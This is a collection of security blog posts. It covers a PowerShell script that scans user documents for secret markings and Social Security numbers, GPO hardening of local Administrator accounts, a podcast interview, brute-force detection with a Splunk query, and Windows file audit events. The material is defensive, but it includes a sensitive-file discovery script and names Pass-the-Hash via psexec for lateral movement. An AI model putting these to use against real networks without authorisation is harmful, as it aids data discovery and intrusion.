      $data = Get-Content $Name
      
      $cnts= @()
      
      if($data.Length -eq 0) { return $cnts} 
      
      foreach ($key in $classify.Keys) {
       
        $m=$classify[$key].matches($data)           
           
        if($m.Count -gt 0) {
           $cnts+= @($key,$m.Count)  
        }
      }   
 $cnts   
}
scan $name
}




#launch a .net chart 
function nchart ($r, $d, $t,$g,$a) {

$task= {
Param($d,$t,$g,$a)

Import-Module C:\Users\Administrator\Documents\charts.psm1
$chart = New-Chart -Dataset $d -Title $t -Type $g -Axis $a
Show-Chart $chart

}
$Task = [powershell]::Create().AddScript($task).AddArgument($d).AddArgument($t).AddArgument($g).AddArgument($a)
$Task.RunspacePool = $r
$Task.BeginInvoke()

}

Register-EngineEvent -SourceIdentifier Delta -Action {
      
      if($event.MessageData -eq "Burst") { #just look at bursts
        New-Event -SourceIdentifier File -MessageData $event.MessageData -EventArguments $event.SourceArgs 
      }
      
      
      Remove-Event -SourceIdentifier Delta
}




$list=Get-WmiObject -Query "SELECT * From CIM_DataFile where Path = '\\Users\\Administrator\\' and Drive = 'C:' and (Extension = 'txt' or Extension = 'doc' or Extension = 'rtf')"  


#long list --let's multithread

#runspace
$RunspacePool = [RunspaceFactory]::CreateRunspacePool(1,5)
$RunspacePool.Open()
$Tasks = @()




foreach ($item in $list) {
  
  $Task = [powershell]::Create().AddScript($scan).AddArgument($item.Name)
  $Task.RunspacePool = $RunspacePool
  
  $status= $Task.BeginInvoke()
  $Tasks += @($status,$Task,$item.Name)
}




#wait
while ($Tasks.isCompleted -contains $false){
  
}


#Analytics, count number of sensitive content for each file
$obj = @{}
$tdcnt=0
$sfcnt=0
$nfcnt=0


for ($i=0; $i -lt $Tasks.Count; $i=$i+3) {
   $match=$Tasks[$i+1].EndInvoke($Tasks[$i]) 
  
   if ($match.Count -gt 0) {   
      $s = ([string]$Tasks[$i+2]).LastIndexOf("\")+1
      
      $obj.Add($Tasks[$i+2].Substring($s),$match)
       for( $j=0; $j -lt $match.Count; $j=$j+2) {      
         switch -wildcard ($match[$j]) {
             'Top*'  { $tdcnt+= 1 }
                      
             'Sens*' { $sfcnt+= 1}                      
                      
             'Numb*' { $nfcnt+=1} 
                                              
      }         
            
       }
   }    
   $Tasks[$i+1].Dispose()
   
}


#Display Initial Dashboard
#Pie chart of sensitive files based on total counts of senstive dat
$piedata= @{}
foreach ( $key in $obj.Keys) {
   $senscnt =0
   for($k=1; $k -lt $obj[$key].Count;$k=$k+2) {
     $senscnt+= $obj[$key][$k]

   }
   $piedata.Add($key, $senscnt) 

}


nchart $RunspacePool $piedata "Files with Sensitive Content" "Pie" $false

#Bar Chart of Total Files, Sensitive  vs Total
$bardata = @{"Total Files" = $Tasks.Count}
$bardata.Add("Files w. Top Secret",$tdcnt)
$bardata.Add("Files w. Sensitive", $sfcnt)
$bardata.Add("Files w. SS Numbers",$nfcnt)


nchart $RunspacePool $bardata "Sensitive Files" "Bar" $false


#run event handler as a seperate job
Start-Job -Name EventHandler -ScriptBlock({C:\Users\Administrator\Documents\evhandler.ps1})


while ($true) { #main message handling loop
   
       [System.Management.Automation.PSEventArgs] $args = Wait-Event -SourceIdentifier File  # wait on event
        Remove-Event -SourceIdentifier File
        #Write-Host $args.SourceArgs      
        if ($args.MessageData -eq "Burst") {
        #Display Bursty event
         $dt=$args.SourceArgs
         #time in seconds
         [datetime]$sevent =$dt[0][1]
         
         $xyarray = [ordered]@{}
         $xyarray.Add(0,1)
         for($j=1;$j -lt $dt.Count;$j=$j+1) {
               [timespan]$diff = $dt[$j][1] - $sevent
               $xyarray.Add($diff.Seconds,$j+1) 
          }
          nchart $RunspacePool $xyarray "Burst Event" "StepLine" $true 
        }        
        
   
}#while

Write-Host "Done!"

 

Lessons Learned

Of course, with any mission the point is the journey not the actual goal, right? The key thing I learned is that you can use PowerShell to do security monitoring. For a single directory, on a small system. And only using it sparingly.

While I plan on improving what I just presented by adding real-time graphics, I’m under no illusion that my final software would be anything more than a toy project.

File event monitoring, analysis, and graphical display of information for an entire system is very, very hard to do on your own. You can, perhaps, recode my solution using C++, but you’ll still have to deal with the lags and hiccups of processing low-level events in the application space. To do this right, you need to have hooks deep in the OS — for starters — and then do far more serious analysis of file events than is performed in my primitive analytics code. That ain’t easy!

I usually end up these DIY posts by saying “you know where this is going.” I won’t disappoint you.

You know where this is going. Our own enterprise-class solution is a true data security platform or DSP – it handles classification, analytics, threat detection, and more for entire IT systems.

By all means, try to roll your own, perhaps based on this project, to learn the difficulties and appreciate what a DSP is actually doing.

Have questions? Feel free to contact us!

Next Steps

If you’re interested in learning more practical, security focused PowerShell, you can unlock the full 3 hour video course on PowerShell and Active Directory Essentials with the code cmdlet.

Working With Windows Local Administrator Accounts, Part III

Working With Windows Local Administrator Accounts, Part III

This article is part of the series "Working With Windows Local Administrator Accounts". Check out the rest:

One point to keep in mind in this series is that we’re trying to limit the powers that are inherent in Administrator accounts. In short: use the Force sparingly. In the last post, we showed it’s possible to remove the local Administrator account and manage it centrally with GPOs. Let’s go over a few things I glossed over last time, and discuss additional ways to secure these accounts.

Restricted Groups: Handle with Care

In my Acme environment, the Restricted Groups GPO is used to push out a domain-level group to the local Administrators group in each of the OUs: one policy for Masa and Pimiento, another for Taco. It’s a neat trick, and for larger domains, it saves IT from having to do this through scripts or spending time performing this manually.

To refresh memories, here’s how my GPO for Restricted Groups looked:

Replaces local  Administrators groups with Acme-IT-1.

By using the “Member of this group” section, I’m forcing the Group Policy Manager to replace, not add, Acme-IT-1 to each local Administrators group in my OU. The problem is you may overwrite existing group members, and you don’t know what services or apps depend on certain local accounts being there.

You’ll likely want to evaluate this idea out on a small sample. This may involve more work— local scripts to re-add those accounts, or possibly creating new domain level accounts that can be added into the above.

Or if you prefer, you can use Group Policy Preferences (GPP). It has an update option for adding a new group (or user) under a local Administrator account (below). We know not to use GPP to reset local Administrator account passwords, right?

With GPP, you can add Acme-IT-2 to the local Administrators groups.

Even More Secure

There is, sigh, a problem in using Restricted Groups and centrally managed domain-level Administrator accounts. Since all users by default,  are under Domain Users, it means that local Administrators can be exploited through Pass-the-Hash (PtH) techniques — get NTLM hash, and pass to psexec — to log on to any other machine in the network.

This was the conundrum we were trying to grapple with in the first place! Recall: local Administrators are usually given simple — easily guessable or hackable — passwords which can then be leveraged to log on to other machines. We wanted to avoid having an Administrator-level local account that can be potentially used globally.

As I mentioned in the second post, this security hole can be addressed by creating a GPO – under User Rights Assignment — to restrict network access all together. This may not be practical in all cases for Administrators accounts.

Another possibility is to limit the machines that these domain-level Administrator accounts can log into. And again we make a lifeline call to User Rights Assignment, but this time enlisting the “Allows log on locally” property, adding the Acme-IT-1 Administrators group (below). We would do the same for the other OU in the Acme domain, but adding the Acme-IT-2 group.

This GPO prevents accounts from logging on to machines outside the specified domain. So even if a clever hacker gets into the Acme company, he could PtH with Administrator account but only within the OU.

It’s a reasonable solution. And I do realize that many companies likely already use this GPO property for ordinary user accounts, just for reasons I noted above.

Additional Thoughts

In writing this brief series, you quickly come to the conclusion that zillions of IT folks already know in their bones: you’re always trying to balance security against convenience. You won’t have a perfect solution, and you’ve probably erred on the side of convenience (to avoid getting shouted at by the user community).

Of course, you live with what you have. But then you should compensate for potential security holes by stepping up your monitoring game! You know where this is going.

One final caveat goes back to my amazing pen testing series where I showed how delegated Administrator groups can be leveraged to allow hacker to hop more freely around a domain—this has to do with accounts being in more than one Active Directory group. Take another look at it!

[Podcast] Roxy Dee, Threat Intelligence Engineer

[Podcast] Roxy Dee, Threat Intelligence Engineer

Leave a review for our podcast & we'll send you a pack of infosec cards.


Some of you might be familiar with Roxy Dee’s infosec book giveaways. Others might have met her recently at Defcon as she shared with infosec n00bs practical career advice. But aside from all the free books and advice, she also has an inspiring personal and professional story to share.

In our interview, I learned about her budding interest in security, but lacked the funds to pursue her passion. How did she workaround her financial constraint? Free videos and notes with Professor Messer! What’s more, she thrived in her first post providing tech support for Verizon Fios. With grit, discipline and volunteering at BSides, she eventually landed an entry-level position as a network security analyst.

Now she works as a threat intelligence engineer and in her spare time, she writes how-tos and shares sage advice on her Medium account, @theroxyd

Transcript

Cindy Ng: For individuals who have had a nonlinear career path in security, Threat Intelligence Engineer Roxy Dee knows exactly what that entails. She begins by describing what it was like to learn about a new industry with limited funding, and how she studied security fundamentals in order to get her foot in the door. In our interview, she reveals three things you need to know about vulnerability management, why fraud detection is a lot like network traffic detection, and how to navigate your career with limited resources.

We currently have a huge security shortage, and people are making analogies as to the kind of people we should hire. For instance, if you’re able to pick up music, you might be able to pick up technology. And I’ve found that in security it’s extremely important to be detail oriented, because the adage is the bad guys only need to be right once and security people need to be right all the time. And I had read on your Medium account the way you got into security, for practical reasons. And so let’s start there, because it might help encourage others to start learning about security on their own. Tell us what aspect of security you found interesting and the circumstances that led you in this direction. –

Roxy Dee: Just to comment on what you’ve said. Actually, that’s a really good reason to make sure you have a diverse team is because everybody has their own special strengths and having a diverse team means that you’ll be able to fight the bad guys a lot better because there will always be someone that has that strength where it’s needed. The bad guys, they can develop their own team the way they want and so it’s important to have a diverse team because every bad guy you meet is going to be different. That’s a very good point, itself.

Cindy Ng: Can you clarify “diverse?” You mean everybody on your team is going to have their own specialty that they’re really passionate about? By knowing what they’re passionate about, you know how to leverage their skill set? Is that what you mean by diversity?

Roxy Dee: Yeah. That’s part of it. I mean, just making sure that you don’t have the same person. For example, I’ll tell my story like you asked in the original question. As a single mom, I have a different experience than someone that has had less difficulties in that area, so I might think of things differently, or be resourceful in different ways. Or I’m not really that great at writing reports. I can write well, but I haven’t had the practice of writing reports. Somebody that went to college, they might have that because they were kind of forced to do it, by having people from different backgrounds that have had different struggles.

And I got into security because I was already into phone phreaking, which is a way of hacking the phone system. And so for me, when I went to my first 2600 Meeting and they were talking about computer security and information security, it was a new topic and I was kind of surprised. I was like, “I thought 2600 was just about phone hacking.” But I realized that at the time…It was 2011, and phone hacking had become less of a thing and computer security became more of something. I got the inspiration to go that route, because I realized that it’s very similar. But as a single mom, I didn’t have the time or the money to go to college and study for it. So I used a lot of self-learning techniques, I went to a lot of conferences, I surrounded myself with people that were interested in the topic, and through that I was able to learn what I needed to do to start my career.

Cindy Ng: People have trouble learning the vocabulary because it’s like learning a new language. How did you…even though you were into phone hacking and the transition into computer security, it has its own distinct language, how did you make the connections and how long did it take you? What experiences did you surround yourself with to cultivate a security mindset?

Roxy Dee: I’ve been on computers since I was a little kid, like four or five years old. So for me, it may not be as difficult for me as other people, because I kind grew up on computers. Having that background helped. But when it came to information security, there were a lot of times where I had no idea what people were saying. Like I did not know what “Reverse Engineering” meant, or I didn’t know what “Trojan” meant. And now, it’s like, “Oh, I obviously know what those things are.” But I had no idea what people were talking about. So going to conferences and watching DEF CON talks, and listening to people. But by the time I had gone to DEF CON about three times, I think it was my third time I went to DEF CON, I thought, “Wow. I actually know what people are saying now.” And it’s just a gradual process, because I didn’t have that formal education.

There were a few conferences that I volunteered at. Mostly at BSides. And BSides are usually free anyway. When you volunteer, you become more visible in the community, and so people will come to you or people will trust you with things. And that was a big part of my career, was networking with people and becoming visible in the community. That way, if I wanted to apply for a job, if I already knew someone there or if I knew someone that knew someone, it was a lot easier to get my resume pushed to the hiring manager than if I just apply.

Cindy Ng: How were you able to land your first security job?

Roxy Dee: And as far as my first InterSec job, I was working in tech support and I was doing very well at it. I was at the top of the metrics, I was always in like the top 10 agents.

Cindy Ng: What were some of the things that you were doing?

Roxy Dee: It was tech support for Verizon Fios. There was a lot of, “Restart your router,” “Restart your set-top box,” things like that. But I was able to learn how to explain things to people in ways that they could understand. So it really helped me understand tech speak, I guess, understand how to speak technically without losing the person, like a non-technical person.

Cindy Ng: And then how did you transition into your next role?

Roxy Dee: It all had to do with networking, and at this point, I had volunteered for a few BSides. So actually, someone that I knew at the time told me about a position that was an entry-level network security analyst, and all I needed to do was get my Security+ certification within the first six months of working there. And so it was an opportunity for me because they accepted entry-level. And when they gave me the assessment that they give people they interview, I aced it because I had studied already about networking through a website called “Professor Messer.” And that website actually helped me with Security+ as well, and I was just able to do that through YouTube videos, like his entire website is just YouTube videos. So once I got there, I took my Security plus and I ended up, actually, on the night shift. So I was able to study in quiet during my shift every day at work. I just made it a routine, “I have to spend, you know, this amount of time studying on,” whatever topic I wanted to move forward with, which I knew what to study because I was going to conferences and I was taking notes from the talks, writing down things I didn’t understand or words I didn’t know and then later I was researching that topic so I could understand more. And then I would watch the talk again with that understanding if it was recorded, or I would go back to my notes with that understanding. The fact that I was working overnight and I was not interrupted really helped, and then from there…and that was like a very entry-level position. And from there, I went to a cloud hosting company, secure cloud hosting company with a focus on security and the great thing about that was that it was a startup. They didn’t have a huge staff, and they had a ton of things that they had to do and a bunch of unrealistic deadlines. So they would constantly be throwing me into situations I was not prepared for.

Cindy Ng: Can you give us an example?

Roxy Dee: Yeah. That was really like the best training for me, is just being able to do it. So when they started a Vulnerability Management Program, I have no experience in vulnerability management before this and they wanted me to be one of the two people on the team. So I had a manager, and then I was the only other person. Through this position, I learned what good techniques are and I was also inspired to do more research on it. And if I hadn’t been given that position, I wouldn’t have been inspired to look it up.

Cindy Ng: What does Vulnerability Management entail, three things that you should know?

Roxy Dee: Yeah. So Vulnerability Management has a lot to do with making sure that all the systems are up to date on patching. That’s one of them. The second thing I would say that’s very important is inventory management, because there were some systems that nobody was using and vulnerabilities existed there, but there was actually no one to fix them. And so if you don’t take proper inventory of your systems and you don’t do, you know, discovery scans to discover what’s out there, you could have something sitting there that an attacker, once they get in, they could use or they might have access to. And then another thing that’s really important in Vulnerability Management is actually managing the data because you’ll get a lot of data. But if you don’t use it properly it’s pretty much useless, if you don’t have a system to track when you need to have this remediated by, what are your compliance requirements? And so you have to track, “When did I discover this and when is it due? And what are the vulnerabilities and what are the systems? What do the systems look like? So there’s a lot of data you’re going to get and you have to manage it, or you will be completely unable to use it.

Cindy Ng: And then you moved on into something else?

Roxy Dee: Oh, yes. Actually, it being a startup kind of wore on me, to be honest. So I got a phone call from a recruiter, actually, while I was at work.

This was another situation where I had no idea how to do what I was tasked with, and the task was…So from my previous positions, I had learned how to monitor and detect, and how to set up alerts, useful alerts that can serve, you know, whatever purpose was needed. So I already had this background. So they said, “We have this application. We want you to log into it, and do whatever you need to do to detect fraud.” Like it was very loosely defined what my role was, “Detect bad things happening on the website.” So I find out that this application actually had been stood up four years prior and they kind of used it for a little while, but then they abandoned it.

And so my job was to bring it back to life and fix some of the issues that they didn’t have time for, or they didn’t actually know how to fix or didn’t want to spend time fixing them. That was extremely beneficial. I had been given a task, so I was motivated to learn this application and how to use it, and I didn’t know anything about fraud. So I spent a lot of time with the Fraud Operations team, and through that, through that experience of being given a task and having to do it, and not knowing anything about it, I learned a lot about fraud.

Cindy Ng: I’d love to hear from your experience what you’ve learned about fraud that most people might not know.

Roxy Dee: What I didn’t consider was that, actually, fraud detection is very much like network traffic detection. You look for a type of activity or a type of behavior and you set up detection for it, and then you make sure that you don’t have too many false positives. And it’s very similar to what network security analysts do. And when I hear security people say, “Oh, I don’t even know where to start with fraud,” well, just think about from a network security perspective if you’re a network security analyst, how you would go about detecting and alerting. And the other aspect of it is the fraudulent activity is almost always an anomaly. It’s almost always something that is not normal. If you’re just looking around for things that are off or not normal, you’re going to find the fraud.

Cindy Ng: But how can you can tell what’s normal and what’s not normal?

Roxy Dee: Well, first, it’s good to look up all sorts of sessions and all sorts of activity and get like a baseline of, you know, “This is normal activity.” But you can also talk to the Fraud team or, you know, or whatever team handles…It’s not specific to fraud, but, you know, if you’re detecting something else, talk to the people that handle it. And ask them, “What would make your alerts better? What is something that has not been found before or something that you were alerted to, but it was too late?” And ask just a bunch of questions, and then you’ll find through asking that what you need to detect.

Like for example, there was one situation where we had a rule that if a certain amount was sent in a certain way, like a wire, that it would alert. But what we didn’t consider was, “What if there’s smaller amounts that add up to a large amount?” And understanding…So we found out that, “Oh, this amount was sent out, but it was sent out in small pieces over a certain amount of time.” So through talking to the Fraud Operations team, if we didn’t discuss it with them, we never would have known that that was something that was an issue. So then we came up with a way to detect those types of fraudulent wire transfers as well.

Cindy Ng: How interesting. Okay. You were talking about your latest role at another bank.

Roxy Dee: I finished my contract and then I went to my current role, which focuses on a lot more than just online activity. I have more to work with now. With each new position, I just kind of layered more experience on top of what I already knew. And I know it’s better to work for a company for a long time and I kind of wish these past six years, I had been with just one company.

Each time that I changed positions, I got more responsibility, pay increase, and I’m hoping I don’t have to change positions as much. But it kind of gave me like a new environment to work with and kind of forced me to learn new things. So I would say, in the beginning of your career, don’t settle. If you get somewhere and you don’t like what you’re being paid, and you don’t think your career is advancing, don’t be afraid to move to a different position, because it’s a lot harder to ask for a raise than to just go somewhere else that’s going to pay you more.

So I’m noticing a lot of the companies that I’m working for, will expect the employees to stay there without giving them any sort of incentive to stay. And so when a new company comes along, they say, you know, “Wow. She’s working on this and that, and she’s making x amount. And we can take all that knowledge that she learned over there, and we can basically buy it for $10,000 more than what she’s making currently.” So companies are interested in grabbing people from other companies that have already had the experience, because it’s kind of a savings in training costs. So, you know, I try to look every six months or so, just to make sure there’s not a better deal out there, because they do exist. And I don’t know how that is in other fields, though. I know in information security, we have that. That’s just the nature of the field right now.

Cindy Ng: I think I got a good overview of your career trajectory. I’m wondering if there’s anything else that you’d want to share with our listeners?

Roxy Dee: Yeah. I guess, I pretty much have spent…So the first two or three years, I spent really working on myself, and making sure that I had all the knowledge and resources I needed to get that first job. The person that I was five or six years ago is different than who I am now. And what I mean is, my situation has changed a bit, to where I have more income and I have more capabilities than I did five years ago. One of the things that’s been important to me is giving back and making sure that, you know, just because I went through struggles five years ago…You know, I understand we all have to go through our struggles. But if I can make something a little bit easier for someone that was in my situation or maybe in a different situation but still needs help, that’s my way of giving back.

And spending $20 to buy someone a book is a lot less of a hit on me financially than it would have been five years ago. Five years ago, I couldn’t afford to drop to even $20 on a book to learn. I had to do everything online, and everything had to be free. I just want to encourage people, if you see an opportunity to help someone and, you know, for example, if you see someone that wants to speak at a conference and they just don’t have the resources to do so. And you think, “Well, this $100 hotel a night, a hotel room is less of a financial hit to me than to, you know, than to that person. And that could mean the difference between them having a career-building opportunity or not having that.” Just seek out ways to help people. One of the things I’ve been doing is the free book giveaway, where I actually have people sending me Amazon gift cards and there is actually one person that’s done it consistently in large amounts. And what I do with that is, like every two weeks, I have a tweet that I send out that if you reply to it with the book that you want, then you can win that book up until I run out of money, up until I run out of Amazon dollars.

Cindy Ng: Is this person an anonymous patron or benefactor? This person just sends you an Amazon gift card…with a few bucks and you share it with everyone? That’s so great.

Roxy Dee: And other people have sent me, you know, $20 to $50 in Amazon credits, and it’s just a really good…It kind of happen accidentally, and there’s the story of it on my Medium account.

Cindy Ng: What were the last three books that you gave away? – Oh, the last three? Well… – Or the last one, if you…

Roxy Dee: …the most popular one right now, this is just based on the last one that I did, is the Defensive Security Handbook. That was the most popular one. But I also get a lot of requests for Practical Packet Analysis by Chris Sanders and Practical Malware Analysis. And so this one, actually, this is a very recent book that came out called the Defensive Security Handbook. That’s by Amanda Berlin and Lee Brotherston. And that’s about…it says, “Best practices for securing infrastructure.” So it’s a blue team-themed book. That’s actually sold over 1,000 copies already and it just came out recently. It came out about a month ago. Yeah. So I think that’s going to be a very popular book for my giveaways.

Cindy Ng: How are you growing yourself these days?

Roxy Dee: Well, I wanted to spend more time writing guides. I just want to write things that can help beginners. I have set up my Medium account, and I posted something on setting up a honeypot network, which is a very…it sounds very complicated, but I broke it down step by step. So my goal in this was to make one article where you could set it up. Because a lot of the issues I was having was, yeah, I might find a guide on how to do something, but it didn’t include every single step. Like they assumed that you knew certain things before you started on that guide. So I want to write things that are easy for people to follow without having to go look up other sources. Or if they do have to look up another source, I have it listed right there. I want to make things that are not assuming that there’s already prior knowledge.

Cindy Ng: Thank you so much for sharing with me, with our listeners.

Roxy Dee: Thank you for letting me tell my story, and I hope that it’s helpful to people. I hope that people get some sort of inspiration, because I had a lot of struggles and, you know, there’s plenty of times I could have quit. And I just want to let people know that there are other ways of doing things and you don’t have to do something a certain way. You can do it the way that works for you.

 

Brute Force: Anatomy of an Attack

Brute Force: Anatomy of an Attack

The media coverage of NotPetya has hidden what might have been a more significant attack: a brute force attack on the UK Parliament.  While for many it was simply fertile ground for Twitter Brexit jokes, an attack like this that targets a significant government body is a reminder that brute force remains a common threat to be addressed.

It also raises important questions as to how such an attack could have happened in the first place:

These issues do suggest that we need to look deeper into this important, but often misunderstood type of attack.

Brute force defined

At the end of the day, there are two methods used to infiltrate an organization: exploit human errors or guesswork. Exploiting human errors has many attack variants: phishing (a user mistake), taking advantage of flawed configuration (an administrator mistake) or abusing a zero-day vulnerability (a developer mistake). Guesswork, on the other hand, is encompassed in one type of attack: brute force.

Most commonly, a brute force attack is used to guess credentials, though it may be used to guess other things such as URLs.

A classic brute force attack is an attempt to guess passwords at the attacker home base, once that attacker got hold of encrypted passwords. This enables the attacker to use powerful computers to test a large number of passwords without risking detection. On the other hand, such a brute force attack can’t be the first step of an attack, since the attacker should already have a copy of the victim’s encrypted passwords.

The online, real-time variant of the attack tries to pound a login function of a system or an application to guess credentials. Since it avoids the need to get encrypted passwords in the first place, attackers can use this technique when attempting to penetrate a system on which they have no prior foothold.

Do online brute force attacks happen?

Trying to guess both a user name and a password is ultimately very hard. Since most systems don’t report whether the username or the password was wrong on failed login, the first shortcut that an attacker takes is to try to attack known users. The attacker can find usernames using open source intelligence: in many organizations, for instance, user names have a predictable structure based on the employee name – and a simple LinkedIn search will reveal a large number of usernames.

That said, this type of classic online brute force attack (at least towards well-established systems) is more myth than a reality. The reason is simple – most modern systems and applications have a built-in countermeasure: lockout. If a user fails to log in more than a few times, the account is locked and requires an administrator intervention to unlock. Today, it’s the lockouts that create a headache to IT departments rather than brute force, making lockout monitoring more essential than brute force detection.

The exception to this is custom-built applications. While the traditional Windows login may not be exploitable, a new web application developed specifically for an upcoming holidays marketing campaign may very well be.

In comes credential stuffing

While classic online brute force attacks seem to be diminishing, credential stuffing is making its way to the central stage. Credential stuffing is an attack in which attackers use credentials – username/password pairs – stolen from public internet sites to break into a target system. The number of successful attacks against public websites is increasing, and the attackers publish the credential databases or sell them on underground exchanges. The assumption, which too often holds true, is that people will use the same username and password across sites.

Credential stuffing bypasses lockout protections since each username is used only once.  By using known username/password pairs, credential stuffing also increases the likelihood of success with a lower number of tries.

Since lockout is not effective as a countermeasure, organizations incorporate two-factor authentication mechanisms to try to avoid credential stuffing – and the use of stolen credentials in general. Two-factor authentication requires a user to have something else besides a password to authenticate: for example, a particular cell phone on which the user can receive a text message. Since two-factor authentication is cumbersome, a successful authentication usually approves any “similar” access. “Similar” may imply the use of the same device or the same geographical location. Most of us have experienced public websites requiring two-factor authentication when we accessed them from a new device, a public computer, or when traveling.

While Two-factor authentication is a robust solution, it has significant downsides: it alters the user experience and requires an interactive login. Nothing is more frustrating than being asked for two-factor authentication on your phone just when landing in a foreign airport after a long flight. As a result, it and is often left as an option for the user. And so, this calls for a detection system, often utilizing analytics, to recognize brute force attacks in action.

Detecting brute force attacks

The most commonly prescribed detection method for brute force seems to address the classic but impractical variant of the attack: detecting multiple failed login attempts for a single user over a short span of time. Many beginner exercises in creating SIEM (Security Information and Event Management) correlation rules focus on detecting brute force attacks by identifying exactly such a scenario. While elegant and straightforward as an exercise, it addresses a practically non-existent attack vector – and we need much more to detect a real world brute force attacks.

The factor that will hold true for any authentication brute force attack is a large number of failed authentication attempts. However, since the user cannot be the key for detection, a detection system has to focus on another key to connect the thread of events making up the attack.

One method will be to track failed authentications from a single source: often the source IP address. However, with public IP addresses becoming scarcer and more expensive, more and more users end up sharing the same source IP.

To overcome this, a detection mechanism can learn the normal rate of connections or of failures from a source IP to determine what would be an abnormal rate, thus taking into account the fact that multiple users might be connecting from the same source IP. The detector might also use a device fingerprint – a combination of properties in the authentication event that are typical to a device – to identify a particular source from those using the same IP address. This cannot be a primary factor, however, and can only help verify detection as most of the fingerprinting properties are under the control of the attacker and can be forged.

Distributed attacks – for example by utilizing a botnet or by rerouting attempts through a network of privacy proxies such as TOR – further complicate the challenge since source monitoring becomes irrelevant. Device fingerprinting may work to an extent, especially if the attack is still carried out by a single source but through multiple routes. An additional approach is to use threat intelligence, which would help to identify access from known botnet nodes or privacy proxies.

The Practicalities of Detection

So far, we’ve assumed that the events used for analysis are neat and tidy: any failed login event is clearly labeled as a “login,” the result is clearly identified as success or failure, and the username is always in the same field and format.

In reality, processing an event stream to make it ready for brute force detection analysis is an additional challenge to consider.

Let’s take Windows, the most ubiquitous source of them all, as an example. The windows successful login event (event ID 4624) and Windows failed login event (event ID 4625) are logged locally on each computer. This makes it more challenging (though not impossible) to collect them. It also means that the attacker – who may own the computer – can prevent them from ever being received. The domain controller registers an authentication event, which can be used as a proxy for a login event. This one comes in a Kerberos (event ID 4768) and NTLM (event ID 4776) variants for Windows 2008 and above and yet another set of event IDs for previous Windows versions.

Once we know which events to track, we still need to know how to identify success and failure correctly. Local login success and failure are separate events, while for the domain controller authentication events, success and failure are flagged within the event.
The following Splunk search (from the GoSplunk search repository), which I’ve used to identify failed vs. successful Windows logins, demonstrates the level of knowledge needed to extract such information from events – and it doesn’t even support the domain controller authentication alternative.

source="WinEventLog:security" (Logon_Type=2 OR Logon_Type=7 OR Logon_Type=10) (EventCode=528 OR EventCode=540 OR EventCode=4624 OR EventCode=4625 OR EventCode=529 OR EventCode=530 OR EventCode=531 OR EventCode=532 OR EventCode=533 OR EventCode=534 OR EventCode=535 OR EventCode=536 OR EventCode=537 OR EventCode=539) | eval status=case(EventCode=528, "Successful Logon", EventCode=540, "Successful Logon", EventCode=4624, "Successful Logon", EventCode=4625, "Failed Logon", EventCode=529, "Failed Logon", EventCode=530, "Failed Logon", EventCode=531, "Failed Logon", EventCode=532, "Failed Logon", EventCode=533, "Failed Logon", EventCode=534, "Failed Logon", EventCode=535, "Failed Logon", EventCode=536, "Failed Logon", EventCode=537, "Failed Logon", EventCode=539, "Failed Logon") | stats count by status | sort - count

Detection through the Cyber Kill-Chain

The brute force example makes it clear that attack detection is not trivial. None of the detection methods described above are bullet proof, and attackers are continually enhancing their detection avoidance methods.

Detection requires expertise in both attack techniques and the behavior of the monitored systems. It also requires ongoing updates and enhancements. It’s therefore critical that any system used for detecting brute force attacks must include out of the box algorithms and updates to those detection algorithms. It’s not enough to simply provide the means to collect events and write the rules or algorithms, which leaves the user with the task of implementing the actual detection logic. It also suggests that it might be worthwhile to understand how a system detects brute force – rather than just relying on a general promise for detecting brute force. There’s just so much more to it than a textbook example will provide.

It is also yet another great example of why a layered detection system that will capture attackers past the infiltration point is critical: and why the cyber kill-chain is a good place to start.

Exploring Windows File Activity Monitoring with the Windows Event Log

Exploring Windows File Activity Monitoring with the Windows Event Log

One might hope that Microsoft would provide straightforward and coherent file activity events in the Windows event log. The file event log is important for all the usual reasons –  compliance, forensics, monitoring privileged users, and detecting ransomware and other malware attacks while they’re happening.  A log of file activities seems so simple and easy, right? All that’s needed is a timestamp, user name, file name, operation (create, read, modify, rename, delete, etc.), and a result (success or failure).

But this is Microsoft. And they never, ever do anything that’s nice and easy.

The Case of “Delete”

Let’s start with delete, the simplest scenario. Google “Windows file delete event” and the first answer, as usual, will be from Randy Franklin Smith’s Windows Event Encyclopedia: “4660: An object was deleted”.

To a Windows event newbie, it would appear that our research effort is complete. Unfortunately, this delete event is missing one critical piece of information: the file name. Why? If you’re detecting ransomware, one would want to know which files are being encrypted. Likewise, when being alerted on privileged user access to sensitive files, one would expect to know exactly which files were accessed.

The hard part is: how do you determine the file name associated with an event? Even identifying something as simple as a file name isn’t easy because Windows event information is spread out across multiple log entries. For example, you’d have to correlate the delete event 4660 with the “access object” event 4663. In practice, you’d create a search for matching 4660 and 4663 events, and then combine information from both events to derive a more user-friendly log entry.

Let’s continue discussing the correlations needed to implement file activity monitoring using the Windows event log. The actual implementation depends on the tools used to collect the event: a database query, a program, or a dedicated correlation engine – a program tailored for such activity.

The Windows File Activity Audit Flow

Windows does not log file activity in a way that you’d expect. Instead, it logs granular file operations that require further processing. So let’s deep dive into how Windows logs file operations.

The diagram below outlines how Windows logs each file operation using multiple micro-operations logs:The delete operation is a unique case in that there is a fourth event, 4660, mentioned above. The sequence is identified by the “Handle ID” event property which is unique to this sequence (at least until a reboot).

The event that provides the most information is 4663, identifying that an attempt was made to access an object. However, the name is misleading because Windows only issues the event when the operation is complete. In reality, there might be multiple 4663 events for a single handle, logging smaller operations that make up the overall action. For example, a rename involves a read, delete, and a write operation. Also, one 4663 event might include multiple values in the “Accesses” property which lists access rights exercised to perform the operation. Those “Accesses” serve as our guideline for the operations themselves. More on that later.

The following table provides more information about each event:

Event ID Name Description Data It Provides
4656 A handle to an object was
requested
Logs the start of every file
activity but does not guarantee that it succeeded
The name of the file
4663 An attempt was made to access an object Logs the specific micro
operations performed as part of the activity
What exactly was done
4660 An object was deleted Logs a delete operation The only way to verify an
activity is actually a delete
4658 The handle to an object was
closed
Logs the end of a file
activity
How much time it took

One step you would not want to skip is setting Windows to log those events, which is not the default. You’ll find a good tutorial on how to do that here.

You get the idea: you’re dealing with lots of different low-level events related to a higher-level file actions. Let’s take up the problem of correlating them to produce user-friendly information.

Interpreting “Accesses”

To identify the actual action, we need to decode the exercised permissions as reported in the “Accesses” event property. Unfortunately, this is not a one-to-one mapping. Each file action is made up of many smaller operations that Windows performs and those smaller operations are the ones logged.

The more important “Accesses” property values are:

  • “WriteData” implies that a file was created or modified unless a “delete” access was recorded for the same handle.
  • “ReadData” will be logged as part of practically any action. It implies “Access” if no “Delete” or “WriteData” were encountered for the same handle and for the same file name around the same time.
